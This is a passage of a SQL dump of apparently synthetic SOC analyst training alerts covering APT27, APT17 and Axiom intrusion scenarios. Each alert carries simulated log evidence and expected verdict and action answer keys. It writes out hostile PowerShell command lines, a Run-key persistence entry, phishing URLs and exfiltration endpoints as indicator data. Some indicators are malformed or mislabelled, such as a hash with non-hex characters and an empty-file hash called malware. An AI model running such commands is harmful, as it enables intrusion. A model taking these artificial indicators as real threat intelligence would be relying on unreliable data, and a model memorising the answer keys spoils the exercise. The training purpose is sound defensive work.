Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1195, 'Credential Dumping and Lateral Movement - Step 4', 'critical', 'Network monitoring and SIEM alerts', 'APT27 has successfully used harvested credentials to move laterally across the network. The attacker accessed a sensitive server containing military technology data using legitimate user credentials.', 'Credential Access and Lateral Movement', 'T1078: Valid Accounts, T1021: Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.54\",\"user\":\"jdoe\",\"action\":\"Successful login\",\"service\":\"RDP\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"passdump.exe\",\"domain\":\"internal.corp.local\",\"log_type\":\"Authentication Success\",\"additional_info\":{\"access_time\":\"3 seconds\",\"sensitive_data_flag\":true}}', '2026-02-07 21:23:28', '2026-02-15 04:20:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT27 command and control IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Associated with credential dumping tools\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Sensitive server housing military technology data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1196, 'Exfiltration of Military Technology Data', 'critical', 'Data loss prevention (DLP) system alerts', 'APT27 successfully exfiltrated critical military technology data to an external server, achieving their objective of technology theft.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"j.doe\",\"file_name\":\"military_tech_blueprints.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"dlp_policy\":\"Sensitive Data Exfiltration\",\"result\":\"Allowed\",\"external_server_domain\":\"malicious-apt27.com\"}', '2026-02-07 21:23:28', '2026-02-16 00:45:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used in data exfiltration event.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known APT27 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"military_tech_blueprints.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File matching sensitive data policy.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known APT27 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-apt27.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by APT27 for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1197, 'Suspicious Access Attempt Detected', 'medium', 'Email security logs', 'A spear-phishing email was detected targeting NGO employees, containing a malicious link designed to harvest credentials. The email originated from an external IP address associated with known phishing activities.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T08:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_from\":\"phishing@maliciousdomain.com\",\"email_to\":\"john.doe@ngo.org\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"invoice.docx\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_link\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\"}', '2026-02-07 21:23:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phishing@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address flagged for phishing activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash has been reported in phishing attachment analysis.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL is part of a credential harvesting campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1198, 'Hikit Rootkit Execution Alert', 'high', 'Endpoint detection and response (EDR) systems', 'The alert indicates the deployment and execution of the Hikit rootkit, a sophisticated tool used by adversaries to maintain a stealthy presence on compromised systems. This activity was detected following initial access.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-17T12:34:56Z\",\"event_id\":\"4624\",\"user\":\"compromisedUser\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\hikit.exe\",\"hash\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\hikit.exe\",\"event_description\":\"A remote command execution was detected from an external IP address using PowerShell, deploying a known malicious rootkit.\"}', '2026-02-07 21:23:36', '2026-02-21 05:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hikit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Hikit rootkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to Hikit rootkit executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1199, 'Unusual Data Exfiltration Activity', 'high', 'Network traffic analysis', 'The final phase involves Axiom exfiltrating sensitive information from the organization\'s databases, targeting documents related to human rights activities, and transferring the data to external servers under their control.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:32:00Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"human_rights_report_2023.docx\",\"user\":\"jdoe\",\"action\":\"exfiltrate\",\"status\":\"success\",\"bytes_transferred\":10485760}', '2026-02-07 21:23:36', '2026-02-21 08:08:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by cybercriminal group Axiom.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated documents.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"human_rights_report_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"sensitive\",\"details\":\"Sensitive document related to human rights activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_audit\",\"verdict\":\"internal\",\"details\":\"User account of the individual who initiated the exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1200, 'Spear Phishing Email Detected', 'medium', 'Email Security Gateway', 'APT17 initiates their operation with a spear phishing campaign, aiming to infiltrate the network by exploiting human vulnerabilities. A targeted email containing a malicious attachment was detected.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T08:37:45Z\",\"email_id\":\"e1b2c3d4-5678-9101-1121-314151617181\",\"from\":\"john.doe@compromised.com\",\"to\":\"victim@company.com\",\"subject\":\"Urgent: Review the attached document\",\"attachment\":\"Invoice_2023.docm\",\"attachment_hash\":\"f5c6e6b8a2b3c4d5f6e7g8h9i0j1k2l3\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.10.15\",\"phishing_url\":\"http://malicious-link.com/secure-login\"}', '2026-02-07 21:24:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@compromised.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing email associated with APT17.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f5c6e6b8a2b3c4d5f6e7g8h9i0j1k2l3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro used for initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for sending phishing emails.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/secure-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for credential 